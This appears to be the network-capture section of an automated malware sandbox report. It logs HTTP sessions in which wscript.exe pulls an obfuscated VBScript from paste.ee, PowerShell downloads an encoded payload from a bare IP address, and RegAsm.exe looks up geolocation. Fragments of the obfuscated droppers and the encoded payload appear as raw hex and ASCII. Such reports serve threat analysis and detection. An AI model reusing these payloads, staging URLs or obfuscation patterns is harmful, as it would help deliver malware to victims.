Apr 20, 2024 11:35:58.637835026 CEST	1289	IN	Data Raw: 73 00 63 00 72 00 69 00 70 00 74 00 20 00 64 00 65 00 76 00 65 00 20 00 73 00 65 00 72 00 20 00 65 00 78 00 65 00 63 00 75 00 74 00 61 00 64 00 6f 00 20 00 61 00 20 00 70 00 61 00 72 00 74 00 69 00 72 00 20 00 64 00 6f 00 20 00 70 00 72 00 6f 00 Data Ascii: script deve ser executado a partir do prompt de comando usando CScript.exe."const L_Help_Help_Host02_Text = "Por ex
Apr 20, 2024 11:35:58.637934923 CEST	1289	IN	Data Raw: 00 61 00 64 00 6f 00 2e 00 22 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 54 00 65 00 78 00 74 00 5f 00 45 00 72 00 72 00 6f 00 72 00 5f 00 47 00 65 00 6e 00 65 00 72 00 61 00 6c 00 30 00 32 00 5f 00 54 00 65 00 78 00 74 00 20 Data Ascii: ado."const L_Text_Error_General02_Text = "No possvel analisar a linha de comando."const acotovelamento = "Cdig
Apr 20, 2024 11:35:58.637974024 CEST	1289	IN	Data Raw: 61 00 6c 00 30 00 38 00 5f 00 54 00 65 00 78 00 74 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 50 00 6f 00 72 00 74 00 61 00 20 00 65 00 78 00 63 00 6c 00 75 00 ed 00 64 00 61 00 22 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 Data Ascii: al08_Text = "Porta excluda"const L_Text_Msg_General09_Text = "No foi possvel obter o objeto SWbemLocator"cons
Apr 20, 2024 11:35:58.638010025 CEST	1289	IN	Data Raw: 00 20 00 22 00 43 00 6f 00 6e 00 74 00 61 00 67 00 65 00 6d 00 20 00 64 00 65 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 61 00 74 00 69 00 76 00 61 00 64 00 61 00 22 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 54 00 65 00 78 Data Ascii: "Contagem de bytes ativada"const L_Text_Msg_Port09_Text = "Contagem de bytes desativada"const L_Text_Msg_Port1
Apr 20, 2024 11:35:58.791728973 CEST	1289	IN	Data Raw: 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 6d 00 61 00 6e 00 6f 00 6e 00 61 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 73 00 70 00 61 00 64 00 69 00 6d 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 Data Ascii: dim manona dim espadim dim oParamDict ' ' Abort if the host is not cscript ' se

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49165	23.95.60.75	80	3272	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 11:36:11.811914921 CEST	73	OUT	GET /144/WQDF.txt HTTP/1.1 Host: 23.95.60.75 Connection: Keep-Alive
Apr 20, 2024 11:36:11.967931032 CEST	1289	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 09:36:11 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 19 Apr 2024 05:53:15 GMT ETag: "a1000-6166cb4316723" Accept-Ranges: bytes Content-Length: 659456 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 41 41 41 2b 51 71 50 51 36 44 69 2b 51 6e 50 73 35 44 5a 2b 77 6c 50 59 35 44 55 2b 77 6a 50 30 34 44 49 2b 67 68 50 51 34 44 43 2b 51 67 50 41 30 44 2f 39 67 66 50 77 33 44 37 39 51 65 50 51 33 44 79 39 51 62 50 73 32 44 70 39 77 5a 50 34 31 44 63 39 67 57 50 6b 31 44 53 39 67 53 50 6b 30 44 43 38 67 4f 50 49 7a 44 71 38 67 49 50 6f 78 44 53 38 67 43 50 49 73 44 36 37 67 38 4f 6f 75 44 69 37 67 32 4f 49 74 44 4b 37 67 67 4f 6f 72 44 79 36 67 71 4f 49 71 44 61 36 67 6b 4f 6f 6f 44 4a 36 67 51 4f 6f 6e 44 79 35 67 61 4f 49 6d 44 62 35 67 57 4f 67 6c 44 51 35 41 53 4f 41 67 44 34 34 41 4d 4f 67 69 44 67 34 41 47 4f 41 68 44 49 34 51 77 4e 34 66 44 32 33 67 37 4e 59 65 44 65 33 67 31 4e 34 63 44 47 32 67 76 4e 6b 62 44 33 32 67 74 4e 51 62 44 79 32 41 73 4e 38 61 44 6b 32 67 6f 4e 38 5a 44 57 32 67 6b 4e 45 5a 44 4b 32 51 69 4e 4d 59 44 43 32 41 51 4e 6b 58 44 34 31 67 64 4e 6b 57 44 6d 31 67 58 4e 73 56 44 51 31 77 53 4e 6b 55 44 49 31 77 52 4e 55 55 44 44 31 51 41 4e 77 54 44 36 30 51 4f 4e 67 54 44 32 30 41 4e 4e 49 54 44 74 30 77 4b 4e 59 53 44 6b 30 77 49 4e 49 53 44 67 30 67 48 4e 77 52 44 58 30 51 46 4e 51 52 44 53 30 41 45 4e 34 51 44 4e 30 67 42 4e 55 4d 44 2f 7a 77 2b 4d 34 4f 44 73 7a 51 36 4d 55 4f 44 59 7a 67 31 4d 4d 4e 44 50 7a 67 77 4d 41 49 44 39 79 51 75 4d 77 4b 44 71 79 77 70 4d 4d 4b 44 57 79 41 6c 4d 45 4a 44 4e 79 41 51 4d 34 48 44 37 78 77 64 4d 6f 47 44 6f 78 51 5a 4d 45 47 44 55 78 67 55 4d 38 45 44 4c 77 67 50 4d 77 44 44 35 77 77 4e 4d 55 44 44 6f 77 67 4a 4d 4d 43 44 68 77 77 48 4d 49 42 44 51 77 51 44 4d 73 41 44 4a 41 41 51 41 51 43 67 42 67 44 41 41 41 38 44 38 2f 67 2b 50 63 2f 44 7a 2f 67 35 50 51 2b 44 68 2f 51 33 50 41 39 44 4f 2f 77 79 50 63 38 44 44 2b 67 76 50 30 36 44 72 2b 41 71 50 51 36 44 67 2b 77 6d 50 6f 34 44 49 2b 51 68 50 45 30 44 30 39 67 63 4f 34 6c 44 59 35 67 56 4f 55 6c 44 55 35 41 55 4f 38 6b 44 4c 35 51 52 4f 4d 6b 44 43 35 51 51 4f 41 67 44 2f 34 67 50 4f 6f 6a 44 35 34 51 4e 4f 38 69 44 74 34 41 4c 4f 73 69 44 71 34 51 4b 4f 67 69 44 6b 34 77 49 4f 38 68 44 5a 34 77 46 4f 59 68 44 56 34 41 46 4f 4d 68 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEAAAA+QqPQ6Di+QnPs5DZ+wlPY5DU+wjP04DI+ghPQ4DC+QgPA0D/9gfPw3D79QePQ3Dy9QbPs2Dp9wZP41Dc9gWPk1DS9gSPk0DC8gOPIzDq8gIPoxDS8gCPIsD67g8OouDi7g2OItDK7ggOorDy6gqOIqDa6gkOooDJ6gQOonDy5gaOImDb5gWOglDQ5ASOAgD44AMOgiDg4AGOAhDI4QwN4fD23g7NYeDe3g1N4cDG2gvNkbD32gtNQbDy2AsN8aDk2goN8ZDW2gkNEZDK2QiNMYDC2AQNkXD41gdNkWDm1gXNsVDQ1wSNkUDI1wRNUUDD1QANwTD60QONgTD20ANNITDt0wKNYSDk0wINISDg0gHNwRDX0QFNQRDS0AEN4QDN0gBNUMD/zw+M4ODszQ6MUODYzg1MMNDPzgwMAID9yQuMwKDqywpMMKDWyAlMEJDNyAQM4HD7xwdMoGDoxQZMEGDUxgUM8EDLwgPMwDD5wwNMUDDowgJMMCDhwwHMIBDQwQDMsADJAAQAQCgBgDAAA8D8/g+Pc/Dz/g5PQ+Dh/Q3PA9DO/wyPc8DD+gvP06Dr+AqPQ6Dg+wmPo4DI+QhPE0D09gcO4lDY5gVOUlDU5AUO8kDL5QROMkDC5QQOAgD/4gPOojD54QNO8iDt4ALOsiDq4QKOgiDk4wIO8hDZ4wFOYhDV4AFOMh
Apr 20, 2024 11:36:11.967993021 CEST	1289	IN	Data Raw: 44 50 34 67 44 4f 6f 67 44 45 34 67 41 4f 45 67 44 41 33 77 2f 4e 34 66 44 36 33 51 2b 4e 55 66 44 76 33 51 37 4e 77 65 44 72 33 77 35 4e 59 65 44 69 33 51 34 4e 30 64 44 58 33 51 31 4e 51 64 44 51 33 67 79 4e 67 63 44 48 33 67 78 4e 55 63 44 42 Data Ascii: DP4gDOogDE4gAOEgDA3w/N4fD63Q+NUfDv3Q7NweDr3w5NYeDi3Q4N0dDX3Q1NQdDQ3gyNgcDH3gxNUcDB2wuNobD02gsNEbDw2wrN4aDq2QqNUaDf2QnNwZDY2wlNMZDN2wiNoYDJ2QhNQYDA1geNgXD31gdNUXDx1AcNwWDm1AZNMWDi1QYN0VDc1AWNIVDQ1wTN4UDK1QSNUQD/0QPNwTD70gONYTD10QMNsSDp0AKNcSDj0
Apr 20, 2024 11:36:11.968033075 CEST	1289	IN	Data Raw: 54 37 51 30 4f 38 73 44 4e 37 77 79 4f 6b 73 44 48 37 51 78 4f 4d 73 44 42 36 77 76 4f 30 72 44 37 36 51 75 4f 63 72 44 31 36 77 73 4f 45 72 44 76 36 51 72 4f 73 71 44 70 36 77 70 4f 55 71 44 6a 36 51 6f 4f 38 70 44 64 36 77 6d 4f 6b 70 44 58 36 Data Ascii: T7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4Q
Apr 20, 2024 11:36:11.968070030 CEST	1289	IN	Data Raw: 36 77 75 4f 6f 72 44 35 36 41 75 4f 63 72 44 32 36 51 74 4f 51 72 44 7a 36 67 73 4f 45 72 44 77 36 77 72 4f 34 71 44 74 36 41 72 4f 73 71 44 71 36 51 71 4f 67 71 44 6e 36 67 70 4f 55 71 44 6b 36 77 6f 4f 49 71 44 68 36 41 6f 4f 38 70 44 65 36 51 Data Ascii: 6wuOorD56AuOcrD26QtOQrDz6gsOErDw6wrO4qDt6ArOsqDq6QqOgqDn6gpOUqDk6woOIqDh6AoO8pDe6QnOwpDb6gmOkpDY6wlOYpDV6AlOMpDS6QkOApDP6gjO0oDM6wiOooDJ6AiOcoDG6QhOQoDD6ggOEoDA5wfO4nD95AfOsnD65QeOgnD35gdOUnD05wcOInDx5AcO8mDu5QbOwmDr5gaOkmDo5wZOYmDl5AZOMmDi5QY
Apr 20, 2024 11:36:11.968139887 CEST	1289	IN	Data Raw: 51 6c 4f 4d 70 44 52 36 77 6a 4f 30 6f 44 4c 36 51 69 4f 63 6f 44 46 36 77 67 4f 45 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 Data Ascii: QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8NEfDv3Q7NseDp3w5NUeDjzA7M
Apr 20, 2024 11:36:11.968179941 CEST	1289	IN	Data Raw: 64 50 76 31 7a 5a 39 6b 55 50 42 31 54 4f 39 45 54 50 70 77 6a 32 38 34 37 4f 78 73 7a 4a 36 30 76 4f 77 72 6a 6a 36 30 6e 4f 33 70 6a 63 36 77 6d 4f 4f 70 54 52 36 77 6a 4f 6e 6b 7a 6f 35 6f 59 4f 43 6c 44 4d 35 4d 53 4f 59 67 44 39 34 51 4d 4f Data Ascii: dPv1zZ9kUPB1TO9ETPpwj2847OxszJ60vOwrjj60nO3pjc6wmOOpTR6wjOnkzo5oYOClDM5MSOYgD94QMO3iTn4IzNybz/28XNjWjXyAqMaCzewIDMOAAAAwHAFAGAAAwP7/z7/M+PX/jk/o3PP9DM/0xPR8TB+AuP16zc+omPk5TW+4kP04jD9QfPC3jm9oWPSxz78MNP4xTb88EPFxjM8ciOVkjh4kQN+Wzi0QNNBTjo0MJNq
Apr 20, 2024 11:36:11.968219042 CEST	1289	IN	Data Raw: 4d 4a 50 54 74 7a 67 35 4d 68 4e 7a 48 79 34 65 4d 79 48 7a 34 78 63 64 4d 48 48 6a 71 78 49 61 4d 34 46 54 49 78 55 52 4d 4a 41 54 39 77 6b 4f 4d 48 43 7a 66 77 45 47 4d 5a 42 54 55 77 6b 45 41 41 41 41 74 41 51 41 30 41 41 41 41 2f 30 2f 50 65 Data Ascii: MJPTtzg5MhNzHy4eMyHz4xcdMHHjqxIaM4FTIxURMJAT9wkOMHCzfwEGMZBTUwkEAAAAtAQA0AAAA/0/Pe+jV/ojP87j8+AtP86zn+AnPZ5jK+URPF3To8gJP0tjy7A4OjtDM7ghOPqzd6smO1ojI5QeOVnjl5EDOXjDz48LOcijf3E8N4dzJ3ogN2bTZ1EBNCSzY0QENZIzrxIYMYFjTw4IMkBDRwEBAAAAeAQAwA8Du/wyPk0
Apr 20, 2024 11:36:11.968259096 CEST	1289	IN	Data Raw: 45 44 54 6c 77 6f 43 41 41 41 41 50 41 51 41 63 41 41 41 41 2b 63 76 50 46 33 7a 4f 39 41 44 50 4f 78 44 4a 37 6f 2f 4f 4e 76 7a 75 37 63 6b 4f 4c 71 7a 4d 36 6b 51 4f 6a 6e 54 76 35 67 6e 4e 73 5a 6a 57 32 51 56 4d 6b 45 6a 48 77 73 4b 4d 6c 43 Data Ascii: EDTlwoCAAAAPAQAcAAAA+cvPF3zO9ADPOxDJ7o/ONvzu7ckOLqzM6kQOjnTv5gnNsZjW2QVMkEjHwsKMlCzRwgBMOADBAAAAABABgBAAA0zn885OYvjv7s6ORujf7QmO2pDc54NOZjTI4oxN/fT+3I/NkfT23I9NleDj2oeNjRD40MMN7Sjs0YINEMzszs6MYNDIwUMAAAAUAQAUAAAA+cvPn7jo+MWPg3TI9cAPayzj80HP3pj
Apr 20, 2024 11:36:11.968298912 CEST	1289	IN	Data Raw: 30 7a 6d 39 73 42 50 47 79 7a 66 38 41 42 50 46 73 44 36 37 67 37 4f 6d 75 7a 63 37 59 32 4f 63 70 6a 62 41 41 41 41 6b 41 77 41 77 43 41 4f 79 68 44 61 34 34 42 4f 55 63 54 34 33 51 39 4e 6d 63 6a 48 33 55 68 4e 59 62 7a 7a 32 55 72 4e 39 59 54 Data Ascii: 0zm9sBPGyzf8ABPFsD67g7Omuzc7Y2OcpjbAAAAkAwAwCAOyhDa44BOUcT43Q9NmcjH3UhNYbzz2UrN9YTM1wcNoQTE0UwMUPjzzc8M5OTmz03MxNDYzU0M3MTLzMyMHIz8yssMwKjqywpM7JzayYmMUBAAAgFADAKAAAwP37z0+QYP13Dn7k/OjeDb1AbNoWjo1oINpPTHzwgMJEjnxkZMBGzNxcBMHDjdwUDMKAAAAwDADAJA
Apr 20, 2024 11:36:11.968342066 CEST	1289	IN	Data Raw: 54 6b 77 73 49 4d 46 43 6a 55 77 6b 45 4d 35 41 54 4b 77 6b 42 4d 50 41 54 42 41 41 51 41 67 43 77 41 51 42 77 50 2f 2f 6a 2b 2f 45 2f 50 6c 2f 54 33 2f 55 39 50 4e 2f 6a 78 2f 38 37 50 34 2b 54 73 2f 6f 36 50 6a 2b 44 6e 2f 59 35 50 51 2b 6a 69 Data Ascii: TkwsIMFCjUwkEM5ATKwkBMPATBAAQAgCwAQBwP//j+/E/Pl/T3/U9PN/jx/87P4+Ts/o6Pj+Dn/Y5PQ+ji/Q4P+9jX/c1PM9zQ/0yPI8zA+0tPY7D0+osPB7zm+QnPu5TX+UlPm4TG+AhPB0T99odPO2Tc9UWPW1TT9IUP10DL8YPPvzD48kJPRyDi7Y/OrvD07I8Ovujk7E2ORtzS7MzOesDG7AgOsrD56wpOWqjf6glOHpTP6
Apr 20, 2024 11:36:12.121550083 CEST	1289	IN	Data Raw: 43 37 51 77 4f 41 6f 44 2f 35 73 49 41 41 41 41 5a 41 49 41 59 41 41 41 41 30 59 50 4e 53 44 54 4a 41 41 41 41 51 41 67 41 51 42 41 4f 62 69 54 58 34 67 78 4e 58 58 6a 63 31 41 56 4e 6c 51 6a 37 30 73 4c 4e 49 4f 6a 32 7a 49 41 41 41 41 41 49 41 Data Ascii: C7QwOAoD/5sIAAAAZAIAYAAAA0YPNSDTJAAAAQAgAQBAObiTX4gxNXXjc1AVNlQj70sLNIOj2zIAAAAAIAIAQAwz28gKPLyjS84CPkwzG8UBPPwzA7I/Opvjs745O1tDb7Y2OgtTU7Q0O3szK74hO2rT76gtOGrzt6cpOKqDW6QDN2TDz0ULNuCAAAAFACABA7M7OCBAAAwAACAAAAAgNxazq2UqNXaTk2soNDCAAAgBABAOA2w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49167	178.237.33.50	80	3540	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 11:36:16.959551096 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Apr 20, 2024 11:36:17.177058935 CEST	1171	IN	HTTP/1.1 200 OK date: Sat, 20 Apr 2024 09:36:17 GMT server: Apache content-length: 963 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 61 72 69 65 74 74 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 47 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 34 2e 30 34 31 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 34 2e 35 30 35 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 31 30 30 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d Data Ascii: { "geoplugin_request":"81.181.57.52", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Marietta", "geoplugin_region":"Georgia", "geoplugin_regionCode":"GA", "geoplugin_regionName":"Georgia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"524", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"34.0414", "geoplugin_longitude":"-84.5053", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49162	104.21.84.67	443	3088	C:\Windows\SysWOW64\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 09:36:00 UTC	302	OUT	GET /d/UZOyJ HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: paste.ee Connection: Keep-Alive
2024-04-20 09:36:00 UTC	1238	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 09:36:00 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BNYryE1WiO4SDbIJiJaWxFFAxuHSQ1EA7l%2B%2BLlnp4UEvyzhlqsjdOaYFaS%2FFoTvG83R21N6adzhQzBMNBei0chJ0J%2FluCNAg743NE%2F7pJ2ytpeFAOkGUYk9iMg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 877425c1ca8b4517-ATL alt-svc: h3=":443"; ma=86400
2024-04-20 09:36:00 UTC	131	IN	Data Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 72 65 63 6f 72 74 65 20 2c 20 69 6d 75 74 61 72 20 2c 20 68 69 64 72 61 6e 74 65 20 2c 20 74 61 71 75 69 64 72 69 74 6f 20 2c 20 70 72 6f 67 72 65 73 73 69 76 61 6d 65 6e 74 65 20 2c 20 43 61 6d 61 20 2c 20 70 72 6f 67 72 65 73 73 69 76 61 6d 65 6e 74 65 31 0d 0a 20 20 20 20 20 69 6d 75 74 61 72 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 68 Data Ascii: 1f7f dim recorte , imutar , hidrante , taquidrito , progressivamente , Cama , progressivamente1 imutar = " " h
2024-04-20 09:36:00 UTC	1369	IN	Data Raw: 69 64 72 61 6e 74 65 20 20 3d 20 22 22 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 69 6d 75 74 61 72 20 26 20 74 61 71 75 69 64 72 69 74 6f 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 Data Ascii: idrante = "" & taquidrito & imutar & taquidrito & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTr
